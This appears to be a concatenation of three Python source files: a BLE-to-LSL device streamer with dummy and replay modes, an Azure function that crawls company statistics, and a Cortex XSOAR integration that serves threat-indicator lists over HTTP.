def _push_chunk(self, name, timestamp):
self._outlets[name].push_chunk(self._chunks[name].tolist(),
timestamp)
def _push_chunk_as_sample(self, name, timestamp):
self._outlets[name].push_sample(self._chunks[name].tolist()[0],
timestamp)
def _add_device_info(self, name):
"""Adds device-specific parameters to `info`."""
desc = self._info[name].desc()
try:
desc.append_child_value("manufacturer", self._device.MANUFACTURER)
except (KeyError, AttributeError):
# a device module without MANUFACTURER raises AttributeError, not KeyError
warn("Manufacturer not specified in device file")
desc.append_child_value("address", self._address)
channels = desc.append_child("channels")
try:
ch_names = self._stream_params.ch_names[name]
# use user-specified ch_names if available and right no. channels
if name in self._user_ch_names:
user_ch_names = self._user_ch_names[name]
if len(user_ch_names) == len(ch_names):
if len(user_ch_names) == len(set(user_ch_names)):
ch_names = user_ch_names
else:
print("Non-unique names in user-defined {} ch_names; "
.format(name), "using default ch_names.")
else:
print("Wrong # of channels in user-defined {} ch_names; "
.format(name), "using default ch_names.")
for c, ch_name in enumerate(ch_names):
unit = self._stream_params.units[name][c]
type_ = self._stream_params.type[name]
channels.append_child("channel") \
.append_child_value("label", ch_name) \
.append_child_value("unit", unit) \
.append_child_value("type", type_)
except KeyError:
raise ValueError("Channel names, units, or types not specified")
@property
def subscriptions(self):
"""The names of the subscribed streams."""
return self._subscriptions
class Streamer(BaseStreamer):
"""Streams data to an LSL outlet from a BLE device.
TODO:
* Try built-in LSL features for intra-chunk timestamps (StreamOutlet)
* initialize_timestamping: should indices be reset to 0 mid-streaming?
"""
def __init__(self, device, address=None, backend='bgapi', interface=None,
autostart=True, scan_timeout=10.5, internal_timestamps=False,
**kwargs):
"""Construct a `Streamer` instance for a given device.
Args:
device (dict): A device module in `ble2lsl.devices`.
For example, `ble2lsl.devices.muse2016`.
Provides info on BLE characteristics and device metadata.
address (str): Device MAC address for establishing connection.
By default, this is acquired automatically using device name.
backend (str): Which `pygatt` backend to use.
Allowed values are `'bgapi'` or `'gatt'`. The `'gatt'` backend
only works on Linux under the BlueZ protocol stack.
interface (str): The identifier for the BLE adapter interface.
When `backend='gatt'`, defaults to `'hci0'`.
autostart (bool): Whether to start streaming on instantiation.
scan_timeout (float): Seconds before timeout of BLE adapter scan.
internal_timestamps (bool): Use internal timestamping.
If `False` (default), uses initial timestamp, nominal sample
rate, and device-provided sample ID to determine timestamp.
If `True` (or when sample IDs not provided), generates
timestamps at the time of chunk retrieval, only using
nominal sample rate as needed to determine timestamps within
chunks.
"""
BaseStreamer.__init__(self, device=device, **kwargs)
self._transmit_queue = Queue()
self._ble_params = self._device.PARAMS.ble
self._address = address
# use internal timestamps if requested, or if stream is variable rate
# (LSL uses nominal_srate=0.0 for variable rates)
nominal_srates = self._stream_params.nominal_srate
self._internal_timestamps = {name: (internal_timestamps
if nominal_srates[name] else True)
for name in device.STREAMS}
self._start_time = stream_idxs_zeros(self._subscriptions)
self._first_chunk_idxs = stream_idxs_zeros(self._subscriptions)
# initialize gatt adapter
if backend == 'bgapi':
self._adapter = pygatt.BGAPIBackend(serial_port=interface)
elif backend in ['gatt', 'bluez']:
# only works on Linux
interface = interface or 'hci0' # default to the first BlueZ adapter (self.interface is never set)
self._adapter = pygatt.GATTToolBackend(interface)
else:
raise(ValueError("Invalid backend specified; use bgapi or gatt."))
self._backend = backend
self._scan_timeout = scan_timeout
self._transmit_thread = threading.Thread(target=self._transmit_chunks)
if autostart:
self.connect()
self.start()
def _init_timestamp(self, name, chunk_idx):
"""Set the starting timestamp and chunk index for a subscription."""
self._first_chunk_idxs[name] = chunk_idx
self._start_time[name] = self._time_func()
def start(self):
"""Start streaming by writing to the send characteristic."""
self._transmit_thread.start()
self._ble_device.char_write(self._ble_params['send'],
value=self._ble_params['stream_on'],
wait_for_response=False)
def stop(self):
"""Stop streaming by writing to the send characteristic."""
self._ble_device.char_write(self._ble_params["send"],
value=self._ble_params["stream_off"],
wait_for_response=False)
def send_command(self, value):
"""Write some value to the send characteristic."""
self._ble_device.char_write(self._ble_params["send"],
value=value,
wait_for_response=False)
def disconnect(self):
"""Disconnect from the BLE device and stop the adapter.
Note:
After disconnection, `start` will not resume streaming.
TODO:
* enable device reconnect with `connect`
"""
self.stop() # stream_off command
self._ble_device.disconnect() # BLE disconnect
self._adapter.stop()
def connect(self, max_attempts=20):
"""Establish connection to BLE device (prior to `start`).
Starts the `pygatt` adapter, resolves the device address if necessary,
connects to the device, and subscribes to the channels specified in the
device parameters.
"""
for _ in range(max_attempts):
try:
self._adapter.start()
break
except pygatt.exceptions.NotConnectedError as notconnected_error:
# dongle not connected
continue
except (ExpectedResponseTimeout, StructError):
continue
except OSError as os_error:
if os_error.errno == 6:
# "device not configured"
print(os_error)
continue
else:
raise os_error
except serial.serialutil.SerialException as serial_exception:
# NOTE: some of these may be raised (apparently harmlessly) by
# the self._adapter._receiver thread, which can't be captured
# here; maybe there is a way to prevent writing to stdout though
if serial_exception.errno == 6:
# "couldn't open port"
print(serial_exception)
continue
else:
raise serial_exception
except pygatt.backends.bgapi.exceptions.BGAPIError as bgapi_error:
# adapter not connected?
continue
time.sleep(0.1)
if self._address is None:
# get the device address if none was provided
self._device_id, self._address = \
self._resolve_address(self._device.NAME)
try:
self._ble_device = self._adapter.connect(self._address,
address_type=self._ble_params['address_type'],
interval_min=self._ble_params['interval_min'],
interval_max=self._ble_params['interval_max'])
except pygatt.exceptions.NotConnectedError:
e_msg = "Unable to connect to device at address {}" \
.format(self._address)
raise(IOError(e_msg))
# initialize LSL outlets and packet handler
self._init_lsl_outlets()
self._packet_handler = self._device.PacketHandler(self)
# subscribe to receive characteristic notifications
process_packet = self._packet_handler.process_packet
for name in self._subscriptions:
try:
uuids = [self._ble_params[name] + '']
except TypeError:
uuids = self._ble_params[name]
for uuid in uuids:
if uuid:
self._ble_device.subscribe(uuid, callback=process_packet)
# subscribe to receive simblee command from ganglion docs
def _resolve_address(self, name):
list_devices = self._adapter.scan(timeout=self._scan_timeout)
for device in list_devices:
if name in device['name']:
return device['name'], device['address']
raise(ValueError("No devices found with name `{}`".format(name)))
def _transmit_chunks(self):
"""TODO: missing chunk vs. missing sample"""
# nominal duration of chunks for progressing non-internal timestamps
chunk_period = {name: (self._stream_params.chunk_size[name]
/ self._stream_params.nominal_srate[name])
for name in self._subscriptions
if not self._internal_timestamps[name]}
first_idx = self._first_chunk_idxs
while True:
name, chunk_idx, chunk = self._transmit_queue.get()
self._chunks[name][:, :] = chunk
# update chunk index records and report missing chunks
# passing chunk_idx=-1 to the queue averts this (ex. status stream)
if not chunk_idx == -1:
if self._chunk_idxs[name] == 0:
self._init_timestamp(name, chunk_idx)
self._chunk_idxs[name] = chunk_idx - 1
if not chunk_idx == self._chunk_idxs[name] + 1:
print("Missing {} chunk {}: {}"
.format(name, chunk_idx, self._chunk_idxs[name]))
self._chunk_idxs[name] = chunk_idx
else:
# track number of received chunks for non-indexed streams
self._chunk_idxs[name] += 1
# generate timestamp; either internally or
if self._internal_timestamps[name]:
timestamp = self._time_func()
else:
timestamp = chunk_period[name] * (chunk_idx - first_idx[name])
timestamp += self._start_time[name]
self._push_func[name](name, timestamp)
@property
def backend(self):
"""The name of the `pygatt` backend used by the instance."""
return self._backend
@property
def address(self):
"""The MAC address of the device."""
return self._address
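# A minimal usage sketch, assuming the `ble2lsl.devices.muse2016` device module
# mentioned in the docstring above is available and a compatible BLE adapter is
# attached; the function below is illustration only and is not called here.
def _example_streamer_usage():
    from ble2lsl.devices import muse2016
    # autostart=True (the default) connects and begins pushing to LSL outlets;
    # the address is resolved by scanning for the device name when not given.
    streamer = Streamer(muse2016, autostart=True)
    return streamer.subscriptions  # names of the streams being pushed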
class Dummy(BaseStreamer):
"""Mimicks a device and pushes local data into an LSL outlet.
TODO:
* verify timestamps/delays (seems too fast in plot.Lines)
"""
def __init__(self, device, chunk_iterator=None, subscriptions=None,
autostart=True, mock_address="DUMMY", **kwargs):
"""Construct a `Dummy` instance.
Args:
device: BLE device to impersonate (i.e. from `ble2lsl.devices`).
chunk_iterator (generator): Class that iterates through chunks.
autostart (bool): Whether to start streaming on instantiation.
"""
nominal_srate = device.PARAMS.streams.nominal_srate
if subscriptions is None:
subscriptions = get_default_subscriptions(device)
subscriptions = {name for name in subscriptions
if nominal_srate[name] > 0}
BaseStreamer.__init__(self, device=device, subscriptions=subscriptions,
**kwargs)
self._device_id = "{}-{}".format(device.NAME, mock_address)
self._address = mock_address
self._init_lsl_outlets()
chunk_shapes = {name: self._chunks[name].shape
for name in self._subscriptions}
self._delays = {name: 1 / (nominal_srate[name] / chunk_shapes[name][1])
for name in self._subscriptions}
# generate or load fake data
if chunk_iterator is None:
chunk_iterator = NoisySinusoids
self._chunk_iter = chunk_iterator
# threads to mimic incoming BLE data
self._threads = {name: threading.Thread(target=self._stream,
kwargs=dict(name=name))
for name in self._subscriptions}
if autostart:
self.start()
def start(self):
"""Start pushing data into the LSL outlet."""
self._proceed = True
for name in self._subscriptions:
self._threads[name].start()
def stop(self):
"""Stop pushing data. Ends execution of chunk streaming threads.
Restart requires a new `Dummy` instance.
"""
self._proceed = False
def _stream(self, name):
"""Run in thread to mimic periodic hardware input."""
for chunk in self._chunk_iter[name]:
if not self._proceed:
# dummy has received stop signal
break
self._chunks[name] = chunk
timestamp = time.time()
self._push_func[name](name, timestamp)
delay = self._delays[name]
# some threads may have long delays;
# subdivide these so threads can stop within ~1 s
while delay > 1 and self._proceed:
time.sleep(1)
delay -= 1
time.sleep(delay % 1)
def make_chunk(self, chunk_ind):
"""Prepare a chunk from the totality of local data.
TODO:
* replaced when using an iterator
"""
self._chunks
# TODO: more realistic timestamps
timestamp = self._time_func()
self._timestamps = np.array([timestamp]*self._chunk_size)
class Replay(Dummy):
def __init__(self, device, path, loop=False, autostart=True, **kwargs):
# with open("tmp.log", "w") as f:
# f.write(json.dumps(chunk_iterator))
chunk_iterator = utils.stream_collect(path, device).read_stream()["CSV"]
super().__init__(device, mock_address="REPLAY",
chunk_iterator=chunk_iterator, autostart=autostart,
**kwargs)
def _stream(self, name):
"""Run in thread to mimic periodic hardware input."""
data = self._chunk_iter[name].start()
for chunk in data:
if not self._proceed:
# dummy has received stop signal
break
self._chunks[name] = chunk[:, 1:]
timestamp = chunk[0, 0]
self._push_func[name](name, timestamp)
delay = self._delays[name]
time.sleep(delay)
def stream_idxs_zeros(subscriptions):
"""Initialize an integer index for each subscription."""
idxs = {name: 0 for name in subscriptions}
return idxs
def empty_chunks(stream_params, subscriptions):
"""Initialize an empty chunk array for each subscription."""
chunks = {name: np.zeros((stream_params.chunk_size[name],
stream_params.channel_count[name]),
dtype=stream_params.numpy_dtype[name])
for name in subscriptions}
return chunks
def get_default_subscriptions(device, pos_rate=False):
# look for default list; if unavailable, subscribe to all
try:
subscriptions = device.DEFAULT_SUBSCRIPTIONS
except AttributeError:
subscriptions = device.STREAMS
if pos_rate:
subscriptions = [name for name in subscriptions
if device.PARAMS.streams.nominal_srate[name] > 0]
return subscriptions
class ChunkIterator:
"""Generator object (i.e. iterator) that yields chunks.
Placeholder until I figure out how this might work as a base class.
"""
def __init__(self, chunk_shape, srate):
self._chunk_shape = chunk_shape
self._srate = srate
class NoisySinusoids(ChunkIterator):
"""Iterator class to provide noisy sinusoidal chunks of data."""
def __init__(self, chunk_shape, srate, freqs=[5, 10, 12, 20], noise_std=1):
super().__init__(chunk_shape=chunk_shape, srate=srate)
self._ang_freqs = 2 * np.pi * np.array(freqs)
self._speriod = 1 / self._srate
self._chunk_t_incr = (1 + chunk_shape[0]) / self._srate
self._freq_amps = np.random.randint(1, 5, len(freqs))
self._noise_std = noise_std
def __iter__(self):
self._t = (np.arange(self._chunk_shape[0]).reshape((-1, 1))
* self._speriod)
return self
def __next__(self):
# start with noise
chunk = np.random.normal(0, self._noise_std, self._chunk_shape)
# sum frequencies with random amplitudes
for i, freq in enumerate(self._ang_freqs):
chunk += self._freq_amps[i] * np.sin(freq * self._t)
self._t += self._chunk_t_incr
return chunk
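# Quick sketch of driving the iterator above (illustration only, not called):
# chunk_shape is (samples_per_chunk, n_channels) and srate is the sample rate
# used to advance the sinusoid phase between chunks.
def _noisy_sinusoids_demo():
    gen = iter(NoisySinusoids(chunk_shape=(12, 4), srate=256))
    first_chunk = next(gen)   # shape (12, 4): noise plus randomly-weighted sinusoids
    second_chunk = next(gen)  # phases advance by roughly one chunk duration
    return first_chunk, second_chunk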
class FileIterator(ChunkIterator):
def __init__(self, path):
self._path = self._path_check(path)
self._files = self._scan_files(self._path)
self._name_pattern = re.compile(self._choose_files(self._files))
def __iter__(self):
return self
def __next__(self):
# Unfinished stub: `chunk` was never defined here and the helper methods
# referenced in __init__ are not implemented in this module.
raise NotImplementedError("FileIterator is an incomplete placeholder")
|
__init__.py
|
import datetime
import logging
import azure.functions as func
import json
import pathlib
import threading
import time
import array
import requests
from .crawler import Crawler
from .model.company import Company
from .model.status_processing import StatusProcessing
from typing import List
from dateutil.relativedelta import relativedelta
from configuration_manager.reader import reader
SETTINGS_FILE_PATH = pathlib.Path(
__file__).parent.parent.__str__() + "//local.settings.json"
def main(req: func.HttpRequest) -> func.HttpResponse:
utc_timestamp = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
try:
logging.info("Timer job 'sosi_func0007_company_statistics' has begun")
config_obj: reader = reader(SETTINGS_FILE_PATH, 'Values')
post_service_url: str = config_obj.get_value("post_service_url")
url_key_statistics: str = config_obj.get_value("url_key_statistics")
url_gross_debit_over_ebitida: str = config_obj.get_value("url_gross_debit_over_ebitida")
url_return_equity_dividend_yield: str = config_obj.get_value("url_return_equity_dividend_yield")
# Messages
ERR_CODE_REQUIRED = "Stock code is required"
ERR_STOCK_NOT_PROCESSED = "{} was not processed"
SUCCESS_STOCK_PROCESSED = "{} processed"
if (not req) or len(req.params) == 0 or (not req.params.get("code")):
logging.error(ERR_CODE_REQUIRED)
# a missing parameter is a client error; 204 (No Content) must not carry a body
return func.HttpResponse(body=json.dumps(StatusProcessing(False, ERR_CODE_REQUIRED).__dict__), status_code=400)
stock_code: str = str(req.params.get("code"))
crawler_obj: Crawler = Crawler(url_key_statistics, url_gross_debit_over_ebitida, url_return_equity_dividend_yield, utc_timestamp)
company_data: Company = crawler_obj.get_data(stock_code)
if company_data:
json_obj = json.dumps(company_data.__dict__, default=lambda o: o.__dict__)
# TODO: At the time, we're not caring about the microservice response here
threading.Thread(target=post_data, args=(post_service_url, json_obj)).start()
return func.HttpResponse(body=json.dumps(StatusProcessing(True, SUCCESS_STOCK_PROCESSED.format(stock_code)).__dict__), status_code=200)
else:
logging.warning(ERR_STOCK_NOT_PROCESSED.format(stock_code))
return func.HttpResponse(body=json.dumps(StatusProcessing(False, ERR_STOCK_NOT_PROCESSED.format(stock_code)).__dict__), status_code=500)
pass
except Exception as ex:
error_log = '{} -> {}'.format(utc_timestamp, str(ex))
logging.exception(error_log)
# pass the exception as text so the response body stays JSON-serializable
return func.HttpResponse(body=json.dumps(StatusProcessing(False, error_log, str(ex)).__dict__), status_code=500)
pass
def post_data(url, json):
headers = {
'content-type': "application/json",
'cache-control': "no-cache",
'content-length': str(len(str(json).encode('utf-8')))
}
requests.request("POST", url, data=json, headers=headers)
pass
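# Sketch of exercising this HTTP-triggered function from a local client; the
# host, port, and route below are placeholders that depend on how the Function
# App is configured (e.g. the `func start` defaults). Not called in this module.
def _example_local_request(stock_code="PETR4"):  # hypothetical stock code
    url = "http://localhost:7071/api/sosi_func0007_company_statistics"  # placeholder route
    response = requests.get(url, params={"code": stock_code})
    return response.status_code, response.json()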
|
EDL.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import re
from base64 import b64decode
from multiprocessing import Process
from gevent.pywsgi import WSGIServer
from tempfile import NamedTemporaryFile
from flask import Flask, Response, request
from netaddr import IPAddress, IPSet
from typing import Callable, List, Any, Dict, cast, Tuple
from ssl import SSLContext, SSLError, PROTOCOL_TLSv1_2
class Handler:
@staticmethod
def write(msg: str):
demisto.info(msg)
''' GLOBAL VARIABLES '''
INTEGRATION_NAME: str = 'EDL'
PAGE_SIZE: int = 200
DEMISTO_LOGGER: Handler = Handler()
APP: Flask = Flask('demisto-edl')
EDL_VALUES_KEY: str = 'dmst_edl_values'
EDL_LIMIT_ERR_MSG: str = 'Please provide a valid integer for EDL Size'
EDL_OFFSET_ERR_MSG: str = 'Please provide a valid integer for Starting Index'
EDL_COLLAPSE_ERR_MSG: str = 'The Collapse parameter only accepts the following values: 0 - Do not Collapse, ' \
'1 - Collapse to Ranges, 2 - Collapse to CIDRs'
EDL_MISSING_REFRESH_ERR_MSG: str = 'Refresh Rate must be "number date_range_unit", examples: (2 hours, 4 minutes, ' \
'6 months, 1 day, etc.)'
''' REFORMATTING REGEXES '''
_PROTOCOL_REMOVAL = re.compile('^(?:[a-z]+:)*//')
_PORT_REMOVAL = re.compile(r'^((?:[a-z]+:)*//([a-z0-9\-\.]+)|([a-z0-9\-\.]+))(?:\:[0-9]+)*')
_URL_WITHOUT_PORT = r'\g<1>'
_INVALID_TOKEN_REMOVAL = re.compile(r'(?:[^\./+=\?&]+\*[^\./+=\?&]*)|(?:[^\./+=\?&]*\*[^\./+=\?&]+)')
DONT_COLLAPSE = "Don't Collapse"
COLLAPSE_TO_CIDR = "To CIDRS"
COLLAPSE_TO_RANGES = "To Ranges"
'''Request Arguments Class'''
class RequestArguments:
def __init__(self,
query: str,
limit: int = 10000,
offset: int = 0,
url_port_stripping: bool = False,
drop_invalids: bool = False,
collapse_ips: str = DONT_COLLAPSE):
self.query = query
self.limit = limit
self.offset = offset
self.url_port_stripping = url_port_stripping
self.drop_invalids = drop_invalids
self.collapse_ips = collapse_ips
def is_request_change(self, last_update_data: Dict):
if self.limit != last_update_data.get('last_limit'):
return True
elif self.offset != last_update_data.get('last_offset'):
return True
elif self.drop_invalids != last_update_data.get('drop_invalids'):
return True
elif self.url_port_stripping != last_update_data.get('url_port_stripping'):
return True
elif self.collapse_ips != last_update_data.get('collapse_ips'):
return True
return False
''' HELPER FUNCTIONS '''
def list_to_str(inp_list: list, delimiter: str = ',', map_func: Callable = str) -> str:
"""
Transforms a list to an str, with a custom delimiter between each list item
"""
str_res = ""
if inp_list:
if isinstance(inp_list, list):
str_res = delimiter.join(map(map_func, inp_list))
else:
raise AttributeError('Invalid inp_list provided to list_to_str')
return str_res
def get_params_port(params: dict = demisto.params()) -> int:
"""
Gets port from the integration parameters
"""
port_mapping: str = params.get('longRunningPort', '')
err_msg: str
port: int
if port_mapping:
err_msg = f'Listen Port must be an integer. {port_mapping} is not valid.'
if ':' in port_mapping:
port = try_parse_integer(port_mapping.split(':')[1], err_msg)
else:
port = try_parse_integer(port_mapping, err_msg)
else:
raise ValueError('Please provide a Listen Port.')
return port
def refresh_edl_context(request_args: RequestArguments) -> str:
"""
Refresh the cache values and format using an indicator_query to call demisto.searchIndicators
Parameters:
request_args: Request arguments
Returns: List(IoCs in output format)
"""
now = datetime.now()
# poll indicators into edl from demisto
iocs = find_indicators_to_limit(request_args.query, request_args.limit, request_args.offset)
out_dict, actual_indicator_amount = create_values_for_returned_dict(iocs, request_args)
while actual_indicator_amount < request_args.limit:
# from where to start the new poll and how many results should be fetched
new_offset = len(iocs) + request_args.offset + actual_indicator_amount - 1
new_limit = request_args.limit - actual_indicator_amount
# poll additional indicators into list from demisto
new_iocs = find_indicators_to_limit(request_args.query, new_limit, new_offset)
# in case no additional indicators exist - exit
if len(new_iocs) == 0:
break
# add the new results to the existing results
iocs += new_iocs
# reformat the output
out_dict, actual_indicator_amount = create_values_for_returned_dict(iocs, request_args)
out_dict["last_run"] = date_to_timestamp(now)
out_dict["current_iocs"] = [{'value': ioc.get('value'), 'indicator_type': ioc.get('indicator_type')}
for ioc in iocs]
set_integration_context(out_dict)
return out_dict[EDL_VALUES_KEY]
def find_indicators_to_limit(indicator_query: str, limit: int, offset: int = 0) -> list:
"""
Finds indicators using demisto.searchIndicators
Parameters:
indicator_query (str): Query that determines which indicators to include in
the EDL (Cortex XSOAR indicator query syntax)
limit (int): The maximum number of indicators to include in the EDL
offset (int): The starting index from which to fetch incidents
Returns:
list: The IoCs list up until the amount set by 'limit'
"""
if offset:
next_page = int(offset / PAGE_SIZE)
# set the offset from the starting page
offset_in_page = offset - (PAGE_SIZE * next_page)
else:
next_page = 0
offset_in_page = 0
# the second returned variable is the next page - it is kept for future re-polling use
iocs, _ = find_indicators_to_limit_loop(indicator_query, limit, next_page=next_page)
# if offset in page is bigger than the amount of results returned return empty list
if len(iocs) <= offset_in_page:
return []
return iocs[offset_in_page:limit + offset_in_page]
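# Worked example of the offset arithmetic above (illustration only, not called):
# with PAGE_SIZE = 200 and offset = 450, polling starts at page 2 and the first
# 50 results of that page are skipped before the limit is applied.
def _offset_paging_example(offset=450):
    next_page = int(offset / PAGE_SIZE)                # 450 // 200 -> 2
    offset_in_page = offset - (PAGE_SIZE * next_page)  # 450 - 400  -> 50
    return next_page, offset_in_page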
def find_indicators_to_limit_loop(indicator_query: str, limit: int, total_fetched: int = 0,
next_page: int = 0, last_found_len: int = PAGE_SIZE):
"""
Finds indicators using while loop with demisto.searchIndicators, and returns result and last page
Parameters:
indicator_query (str): Query that determines which indicators to include in
the EDL (Cortex XSOAR indicator query syntax)
limit (int): The maximum number of indicators to include in the EDL
total_fetched (int): The amount of indicators already fetched
next_page (int): The page we are up to in the loop
last_found_len (int): The amount of indicators found in the last fetch
Returns:
(tuple): The iocs and the last page
"""
iocs: List[dict] = []
if not last_found_len:
last_found_len = total_fetched
while last_found_len == PAGE_SIZE and limit and total_fetched < limit:
fetched_iocs = demisto.searchIndicators(query=indicator_query, page=next_page, size=PAGE_SIZE).get('iocs')
# In case the result from searchIndicators includes the key `iocs` but its value is None
fetched_iocs = fetched_iocs or []
iocs.extend(fetched_iocs)
last_found_len = len(fetched_iocs)
total_fetched += last_found_len
next_page += 1
return iocs, next_page
def ip_groups_to_cidrs(ip_range_groups: list):
"""Collapse ip groups list to CIDRs
Args:
ip_range_groups (list): a list of lists containing connected IPs
Returns:
list. a list of CIDRs.
"""
ip_ranges = [] # type:List
for cidr in ip_range_groups:
# handle single ips
if len(cidr) == 1:
# CIDR with a single IP appears with "/32" suffix so handle them differently
ip_ranges.append(str(cidr[0]))
continue
ip_ranges.append(str(cidr))
return ip_ranges
def ip_groups_to_ranges(ip_range_groups: list):
"""Collapse ip groups list to ranges.
Args:
ip_range_groups (list): a list of lists containing connected IPs
Returns:
list. a list of Ranges.
"""
ip_ranges = [] # type:List
for group in ip_range_groups:
# handle single ips
if len(group) == 1:
ip_ranges.append(str(group[0]))
continue
ip_ranges.append(str(group))
return ip_ranges
def ips_to_ranges(ips: list, collapse_ips: str):
"""Collapse IPs to Ranges or CIDRs.
Args:
ips (list): a list of IP strings.
collapse_ips (str): Whether to collapse to Ranges or CIDRs.
Returns:
list. a list to Ranges or CIDRs.
"""
if collapse_ips == COLLAPSE_TO_RANGES:
ips_range_groups = IPSet(ips).iter_ipranges()
return ip_groups_to_ranges(ips_range_groups)
else:
cidrs = IPSet(ips).iter_cidrs()
return ip_groups_to_cidrs(cidrs)
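# Sketch of the two collapse modes (illustration only, not called). The exact
# grouping is produced by netaddr: contiguous addresses become one range, while
# CIDR collapsing may need several networks to cover the same addresses.
def _collapse_example():
    ips = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
    as_ranges = ips_to_ranges(ips, COLLAPSE_TO_RANGES)  # e.g. ['1.1.1.1-1.1.1.3']
    as_cidrs = ips_to_ranges(ips, COLLAPSE_TO_CIDR)     # e.g. ['1.1.1.1', '1.1.1.2/31']
    return as_ranges, as_cidrs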
def create_values_for_returned_dict(iocs: list, request_args: RequestArguments) -> Tuple[dict, int]:
"""
Create a dictionary for output values
"""
formatted_indicators = []
ipv4_formatted_indicators = []
ipv6_formatted_indicators = []
for ioc in iocs:
indicator = ioc.get('value')
if not indicator:
continue
ioc_type = ioc.get('indicator_type')
# protocol stripping
indicator = _PROTOCOL_REMOVAL.sub('', indicator)
# Port stripping
indicator_with_port = indicator
# remove port from indicator - from demisto.com:369/rest/of/path -> demisto.com/rest/of/path
indicator = _PORT_REMOVAL.sub(_URL_WITHOUT_PORT, indicator)
# check if removing the port changed something about the indicator
if indicator != indicator_with_port and not request_args.url_port_stripping:
# if port was in the indicator and url_port_stripping param not set - ignore the indicator
continue
# Reformatting to PAN-OS URL format
with_invalid_tokens_indicator = indicator
# mix of text and wildcard in domain field handling
indicator = _INVALID_TOKEN_REMOVAL.sub('*', indicator)
# check if the indicator held invalid tokens
if with_invalid_tokens_indicator != indicator:
# invalid tokens in indicator- if drop_invalids is set - ignore the indicator
if request_args.drop_invalids:
continue
# for PAN-OS *.domain.com does not match domain.com
# we should provide both
# this could generate more than num entries according to PAGE_SIZE
if indicator.startswith('*.'):
# strip only the leading "*." prefix; str.lstrip removes characters, not a prefix
formatted_indicators.append(indicator[2:])
if request_args.collapse_ips != DONT_COLLAPSE and ioc_type == 'IP':
ipv4_formatted_indicators.append(IPAddress(indicator))
elif request_args.collapse_ips != DONT_COLLAPSE and ioc_type == 'IPv6':
ipv6_formatted_indicators.append(IPAddress(indicator))
else:
formatted_indicators.append(indicator)
if len(ipv4_formatted_indicators) > 0:
ipv4_formatted_indicators = ips_to_ranges(ipv4_formatted_indicators, request_args.collapse_ips)
formatted_indicators.extend(ipv4_formatted_indicators)
if len(ipv6_formatted_indicators) > 0:
ipv6_formatted_indicators = ips_to_ranges(ipv6_formatted_indicators, request_args.collapse_ips)
formatted_indicators.extend(ipv6_formatted_indicators)
return {EDL_VALUES_KEY: list_to_str(formatted_indicators, '\n')}, len(formatted_indicators)
def get_edl_ioc_values(on_demand: bool,
request_args: RequestArguments,
integration_context: dict,
cache_refresh_rate: str = None) -> str:
"""
Get the ioc list to return in the edl
Args:
on_demand: Whether on demand configuration is set to True or not
request_args: the request arguments
integration_context: The integration context
cache_refresh_rate: The cache_refresh_rate configuration value
Returns:
string representation of the iocs
"""
last_run = integration_context.get('last_run')
last_query = integration_context.get('last_query')
current_iocs = integration_context.get('current_iocs')
# on_demand ignores cache
if on_demand:
if request_args.is_request_change(integration_context):
values_str = get_ioc_values_str_from_context(integration_context, request_args=request_args,
iocs=current_iocs)
else:
values_str = get_ioc_values_str_from_context(integration_context, request_args=request_args)
else:
if last_run:
cache_time, _ = parse_date_range(cache_refresh_rate, to_timestamp=True)
if last_run <= cache_time or request_args.is_request_change(integration_context) or \
request_args.query != last_query:
values_str = refresh_edl_context(request_args)
else:
values_str = get_ioc_values_str_from_context(integration_context, request_args=request_args)
else:
values_str = refresh_edl_context(request_args)
return values_str
def get_ioc_values_str_from_context(integration_context: dict,
request_args: RequestArguments,
iocs: list = None) -> str:
"""
Extracts output values from cache
Args:
integration_context: The integration context
request_args: The request args
iocs: The current raw iocs data saved in the integration context
Returns:
string representation of the iocs
"""
if iocs:
if request_args.offset > len(iocs):
return ''
iocs = iocs[request_args.offset: request_args.limit + request_args.offset]
returned_dict, _ = create_values_for_returned_dict(iocs, request_args=request_args)
integration_context['last_output'] = returned_dict
set_integration_context(integration_context)
else:
returned_dict = integration_context.get('last_output', {})
return returned_dict.get(EDL_VALUES_KEY, '')
def try_parse_integer(int_to_parse: Any, err_msg: str) -> int:
"""
Tries to parse an integer, and if fails will throw DemistoException with given err_msg
"""
try:
res = int(int_to_parse)
except (TypeError, ValueError):
raise DemistoException(err_msg)
return res
def validate_basic_authentication(headers: dict, username: str, password: str) -> bool:
"""
Checks whether the authentication is valid.
:param headers: The headers of the http request
:param username: The integration's username
:param password: The integration's password
:return: Boolean which indicates whether the authentication is valid or not
"""
credentials: str = headers.get('Authorization', '')
if not credentials or 'Basic ' not in credentials:
return False
encoded_credentials: str = credentials.split('Basic ')[1]
credentials: str = b64decode(encoded_credentials).decode('utf-8')
if ':' not in credentials:
return False
credentials_list = credentials.split(':')
if len(credentials_list) != 2:
return False
user, pwd = credentials_list
return user == username and pwd == password
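# Sketch of the header format expected above (illustration only, not called):
# the client sends `Authorization: Basic base64("<username>:<password>")`.
def _example_basic_auth_header(username='user', password='pass'):
    from base64 import b64encode
    token = b64encode(f'{username}:{password}'.encode('utf-8')).decode('utf-8')
    return {'Authorization': f'Basic {token}'}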
''' ROUTE FUNCTIONS '''
@APP.route('/', methods=['GET'])
def route_edl_values() -> Response:
"""
Main handler for values saved in the integration context
"""
params = demisto.params()
credentials = params.get('credentials') if params.get('credentials') else {}
username: str = credentials.get('identifier', '')
password: str = credentials.get('password', '')
if username and password:
headers: dict = cast(Dict[Any, Any], request.headers)
if not validate_basic_authentication(headers, username, password):
err_msg: str = 'Basic authentication failed. Make sure you are using the right credentials.'
demisto.debug(err_msg)
return Response(err_msg, status=401)
request_args = get_request_args(request.args, params)
values = get_edl_ioc_values(
on_demand=params.get('on_demand'),
request_args=request_args,
integration_context=get_integration_context(),
cache_refresh_rate=params.get('cache_refresh_rate'),
)
return Response(values, status=200, mimetype='text/plain')
def get_request_args(request_args: dict, params: dict) -> RequestArguments:
"""
Processing a flask request arguments and generates a RequestArguments instance from it.
Args:
request_args: Flask request arguments
params: Integration configuration parameters
Returns:
RequestArguments instance with processed arguments
"""
limit = try_parse_integer(request_args.get('n', params.get('edl_size', 10000)), EDL_LIMIT_ERR_MSG)
offset = try_parse_integer(request_args.get('s', 0), EDL_OFFSET_ERR_MSG)
query = request_args.get('q', params.get('indicators_query'))
strip_port = request_args.get('sp', params.get('url_port_stripping', False))
drop_invalids = request_args.get('di', params.get('drop_invalids', False))
collapse_ips = request_args.get('tr', params.get('collapse_ips', DONT_COLLAPSE))
# handle flags
if drop_invalids == '':
drop_invalids = True
if strip_port == '':
strip_port = True
